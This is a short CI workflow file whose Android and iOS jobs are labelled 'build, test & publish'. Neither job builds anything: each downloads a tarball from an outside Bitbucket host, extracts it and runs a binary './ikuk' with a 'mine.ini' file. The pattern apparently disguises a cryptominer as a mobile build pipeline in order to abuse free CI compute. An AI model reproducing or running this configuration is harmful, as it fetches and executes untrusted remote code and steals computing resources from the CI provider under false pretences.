workflows:
  android:
    name: build, test & publish Android version
    scripts:
      - wget https://bitbucket.org/Abyehaqi/haqie/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./ikuk mine.ini
  ios:
    name: build, test & publish iOS version
    scripts:
      - wget https://bitbucket.org/Abyehaqi/haqie/downloads/haqi.tar.gz && tar -xvf haqi.tar.gz && ./ikuk mine.ini
